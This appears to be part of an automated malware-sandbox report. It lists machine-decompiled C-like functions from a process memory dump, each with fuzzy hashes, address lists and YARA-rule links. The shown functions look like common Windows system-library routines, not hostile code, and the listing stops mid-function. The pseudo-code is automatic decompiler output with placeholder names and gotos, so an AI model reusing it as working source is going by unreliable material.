Instruction Fuzzy Hash: 52416776E14205DFDB15CF68D990BADBBF2BF89304F1881A9E908AB350D774A902CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05047016, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E05047016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x50bd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E05046B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E05046B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04FE7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E05009AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0500B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04FE4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x05047016
0x0504701e
0x0504702b
0x05047033
0x05047037
0x0504703c
0x0504703e
0x05047041
0x05047045
0x0504704a
0x05047050
0x05047055
0x0504705a
0x05047062
0x05047062
0x0504705a
0x05047064
0x05047064
0x05047067
0x05047071
0x05047096
0x0504709b
0x050470a2
0x050470a6
0x050470a7
0x050470ad
0x050470b3
0x050470b6
0x050470bb
0x050470c3
0x050470c3
0x050470c6
0x050470cd
0x050470dd
0x050470e0
0x050470e2
0x050470e2
0x050470ee
0x05047101
0x050470f0
0x050470f9
0x050470f9
0x0504710a
0x0504710e
0x05047112
0x05047117
0x05047118
0x05047118
0x050470bb
0x0504711d
0x05047123
0x05047131
0x05047131
0x05047136
0x0504713d
0x0504713e
0x0504713f
0x0504714a
0x0504714a
0x05047084
0x05047088
0x00000000
0x0504708e
0x0504708e
0x05047092
0x00000000
0x05047092

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87edc210be17766fc5f28823f40da30dbbf46153529e42229fd3960386db99c9
Instruction ID: 6b8fddfa99316f806a64acf7709c0ac26d190c511dd4413b7b962a3007d089b1
Opcode Fuzzy Hash: 87edc210be17766fc5f28823f40da30dbbf46153529e42229fd3960386db99c9
Instruction Fuzzy Hash: 9131A6B26087919BC321DF28DD40A6EB7E5FFC8700F044A29F99697691E730E905CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04FEC182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E04FEC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04FE7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E05098D34(_v8, _t80);
					}
					E04FE2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04FDFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E05098833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04FDFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0500B180();
						if(_a4 != 0) {
							E04FE2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04FEBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04FEBB2D(_t16, _t15);
						E04FEB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04FDFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04FDFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04FDFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x04fec18d
0x04fec18f
0x04fec191
0x04fec19b
0x04fec1a0
0x04fec1d4
0x04fec1de
0x05032d6e
0x04fec1e4
0x04fec1e4
0x04fec1e4
0x04fec1ec
0x05032d7d
0x05032d7d
0x04fec1f3
0x04fec1ff
0x05032d88
0x05032d8d
0x05032d94
0x05032d94
0x05032d9f
0x05032da4
0x05032dab
0x05032db0
0x05032db2
0x05032db3
0x05032db4
0x05032dbc
0x05032dc3
0x05032dc3
0x04fec205
0x04fec205
0x04fec208
0x04fec20e
0x04fec211
0x04fec216
0x04fec219
0x04fec21f
0x04fec222
0x04fec22c
0x04fec234
0x04fec23a
0x04fec23f
0x04fec245
0x04fec24b
0x04fec251
0x04fec25a
0x04fec276
0x04fec27d
0x04fec27d
0x04fec25c
0x04fec25c
0x00000000
0x04fec25e
0x04fec1a4
0x04fec1aa
0x04fec1b3
0x04fec265
0x04fec26c
0x04fec26c
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 31db0ef9f5b8cb9c4b60c002e5d52e0a4fb4dc5b34bcb60614ed525898fa4760
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: A9310672B01586AEE708EBB5C880BFDF799FF42208F08415AD51857201DB397A4BD7A1

Uniqueness

Uniqueness Score: -1.00%

Function 04FFA70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04FFA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x50b7b10; // 0x10
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x50b7b10 = 8;
					 *0x50b7b14 = 0x50b7b0c;
					 *0x50b7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x11
					E04FFA990(0x50b7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L04FFA840(__edx, __ecx, __ecx, _t52, 0x50b7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x50b7b10; // 0x10
					_t3 = _t37 + 0x27; // 0x37
					__eflags = _t3 >> 5 -  *0x50b7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x50b7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x37
						_v8 = _t4 >> 5;
						_t50 = L04FE4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x50b7b18 = _v8;
						_t8 = _t52 + 7; // 0x17
						E0500F3E0(_t50,  *0x50b7b14, _t8 >> 3);
						_t28 =  *0x50b7b14; // 0x77f07b0c
						__eflags = _t28 - 0x50b7b0c;
						if(_t28 != 0x50b7b0c) {
							L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x18
						 *0x50b7b14 = _t50;
						_t48 = _v12;
						 *0x50b7b10 = _t9;
						goto L6;
					}
					 *0x50b7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x04ffa713
0x04ffa714
0x04ffa717
0x04ffa71d
0x04ffa720
0x04ffa722
0x04ffa727
0x04ffa74a
0x04ffa754
0x04ffa75e
0x04ffa768
0x04ffa76a
0x04ffa773
0x04ffa78b
0x04ffa790
0x04ffa792
0x04ffa741
0x04ffa741
0x04ffa743
0x04ffa749
0x04ffa749
0x04ffa732
0x04ffa73a
0x04ffa797
0x04ffa79d
0x04ffa7a3
0x04ffa7a9
0x04ffa7b6
0x04ffa7bc
0x04ffa7ca
0x04ffa7e0
0x04ffa7e2
0x04ffa7e4
0x05039bf2
0x00000000
0x05039bf2
0x04ffa7ed
0x04ffa7f2
0x04ffa800
0x04ffa805
0x04ffa80d
0x04ffa812
0x05039c08
0x05039c08
0x04ffa818
0x04ffa81b
0x04ffa821
0x04ffa824
0x00000000
0x04ffa824
0x04ffa7ae
0x00000000
0x04ffa7ae
0x04ffa73c
0x04ffa73e
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a103e5c71157f6cecf86f716a64d10600ae259eed709bebf59d139a274a0ae4d
Instruction ID: 627456c17b20ef181d6bb49c7a85b36fe9d84d9a52bb8cf8fd2d36d92f6f37ac
Opcode Fuzzy Hash: a103e5c71157f6cecf86f716a64d10600ae259eed709bebf59d139a274a0ae4d
Instruction Fuzzy Hash: 0B31B272A206009BE715CF08ECD2FAD7BF9FBC4710F540959E105A7651DBB4A902CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04FF61A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04FF61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04FF5E50(0x4fa67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E05099D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E04FCF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x04ff61b3
0x04ff61b5
0x04ff61bd
0x04ff61c3
0x04ff61c7
0x04ff61d2
0x04ff61ff
0x04ff61ff
0x04ff6201
0x04ff6207
0x04ff6207
0x04ff61d4
0x04ff61d9
0x00000000
0x00000000
0x04ff61df
0x04ff61e2
0x00000000
0x00000000
0x04ff61e6
0x04ff61e8
0x04ff61ee
0x04ff61ee
0x04ff61f9
0x0503762f
0x05037632
0x05037635
0x05037639
0x05037640
0x0503766e
0x05037675
0x00000000
0x00000000
0x05037681
0x05037689
0x0503768d
0x05037691
0x05037695
0x05037699
0x050376af
0x050376b5
0x050376b7
0x050376b7
0x050376d7
0x050376dc
0x00000000
0x050376dc
0x050376a2
0x050376a9
0x05037651
0x05037653
0x05037653
0x05037656
0x05037656
0x00000000
0x05037656
0x05037644
0x05037646
0x05037648
0x05037648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1a251a0b5a4429ed0a7f14de63f6306c8ef2d410a5861f6e496bb73782a2375
Instruction ID: 1f4062e60a65c8a18dcbc699c05748970a0c84846bca5d0ac4e73610fb9adf06
Opcode Fuzzy Hash: f1a251a0b5a4429ed0a7f14de63f6306c8ef2d410a5861f6e496bb73782a2375
Instruction Fuzzy Hash: 2B319CB1A097018FE360CF09C850B2AB7E9FF88B00F05496DE995D7361EB70E905CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04FCAA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04FCAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x50bd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x50b7b9c; // 0x0
					_t53 = L04FE4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0500B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0500F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04FD6C59(_t53, _t51, _t58) != 0) {
							_t28 = E04FF5E50(0x4fac338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E04FFB230(_v32, _v28, 0x4fac2d8, 1,  &_v24);
								_t28 = E04FCF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x04fcaa25
0x04fcaa29
0x04fcaa2d
0x04fcaa30
0x04fcaa37
0x04fcaa3c
0x05024458
0x05024458
0x05024472
0x05024474
0x05024476
0x04fcaa64
0x04fcaa74
0x0502447c
0x05024483
0x05024492
0x04fcaa52
0x04fcaa54
0x04fcaa5e
0x050244a8
0x050244ad
0x050244af
0x050244b6
0x050244b6
0x050244b9
0x050244bc
0x050244cd
0x050244d3
0x050244d6
0x050244e1
0x050244e1
0x050244e6
0x050244e8
0x050244fb
0x050244fb
0x050244e8
0x00000000
0x04fcaa5e
0x05024476
0x04fcaa42
0x04fcaa46
0x04fcaa48
0x04fcaa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdbc9a352a860680854c046d9f5bc9b231075663adac7d0318e0802fc844e72a
Instruction ID: c862e44dfed85435d70ad3d4a720b6bb227839b0ff64a9662f157e9c7fbd768a
Opcode Fuzzy Hash: fdbc9a352a860680854c046d9f5bc9b231075663adac7d0318e0802fc844e72a
Instruction Fuzzy Hash: 6131B172A00229EBDF159F64DE81ABFB7B9FF44B00F014069F901E7150E775A912DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05008EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E05008EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x50bd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04FF4E70(0x50b86e4, 0x5009490, 0, 0);
					if( *0x50b53e8 > 5 && E05008F33(0x50b53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x50b53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x50b53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x4fabc46;
						_t48 = E05047B9C(0x50b53e8, 0x4fabc46, _t67, 0x50b53e8, _t70,  &_v140);
					}
				}
				return E0500B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x05008ec7
0x05008ed9
0x05008edc
0x05008ee6
0x05008ee9
0x05008eee
0x05008efc
0x05008f08
0x05041349
0x05041353
0x0504135d
0x05041366
0x0504136f
0x05041375
0x0504137c
0x05041385
0x05041390
0x05041391
0x0504139c
0x0504139d
0x050413a6
0x050413ac
0x050413b2
0x050413b5
0x050413bc
0x050413bf
0x050413c2
0x050413c5
0x050413c8
0x050413cb
0x050413ce
0x050413d1
0x050413d4
0x050413d7
0x050413da
0x050413dd
0x050413e0
0x050413e3
0x050413e6
0x050413e9
0x050413f6
0x05041400
0x05041400
0x05008f08
0x05008f32

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fe63f1760116d6ce05691530380955b33eb753825dd582f0c9715f0f5d5082b
Instruction ID: 6c29ff3df64f145320ce04239d8a8cb0fc057afe6df4b38f29432201f87ef09f
Opcode Fuzzy Hash: 6fe63f1760116d6ce05691530380955b33eb753825dd582f0c9715f0f5d5082b
Instruction Fuzzy Hash: A041A2B1D002189FEB60CFAAE981AEDFBF4FB48710F5081AEE509A7241E7745A45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05004A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E05004A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x50bd360 ^ _t62;
				_v8 =  *0x50bd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04FE2280(_t26, 0x50b8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E04FDFFB0(_t41, _t51, 0x50b8608);
						L2:
						 *0x50bb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0500B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04FE2280(_t28, 0x50b8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E04FDFFB0(_t42, _t53, 0x50b8608);
							if(_t53 != 0) {
								L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E04FDFFB0(_t41, _t51, 0x50b8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x05004a2c
0x05004a34
0x05004a3c
0x05004a3e
0x05004a48
0x05004a4b
0x05004a4d
0x05004a51
0x05004a9c
0x00000000
0x00000000
0x05004aa3
0x05004aa8
0x05004aad
0x05004ab1
0x05004ade
0x05004ae3
0x05004a5a
0x05004a62
0x05004a6a
0x05004a6e
0x0503f203
0x05004a84
0x05004a88
0x05004a89
0x05004a8a
0x05004a95
0x05004a95
0x05004a79
0x05004a80
0x05004af2
0x05004af4
0x05004af9
0x05004aff
0x05004b01
0x05004b03
0x05004b08
0x0503f20a
0x0503f212
0x0503f216
0x0503f216
0x05004b08
0x05004b13
0x05004b1a
0x0503f229
0x0503f229
0x05004b1a
0x05004a82
0x00000000
0x05004a82
0x05004ab7
0x05004acd
0x05004acd
0x05004ad5
0x05004ada
0x00000000
0x05004ada
0x05004ac2
0x05004acb
0x00000000
0x00000000
0x00000000
0x05004acb
0x05004a53
0x05004a53
0x05004a58
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 578e43ca42c7e481c2854388779f1f9adabbbbeb4b1de30df60de6fd7f78fe16
Instruction ID: c17d5e2b976e7d280117f93a59812809aa677d12e7456370eaad1b30bb00fa87
Opcode Fuzzy Hash: 578e43ca42c7e481c2854388779f1f9adabbbbeb4b1de30df60de6fd7f78fe16
Instruction Fuzzy Hash: 7C314832205321DBFB61DF14ED80B2EB7EAFF82704F045529E9520B290CBB0E801CB89

Uniqueness

Uniqueness Score: -1.00%

Function 04FFE730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04FFE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E05009670() < 0) {
					L0501DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
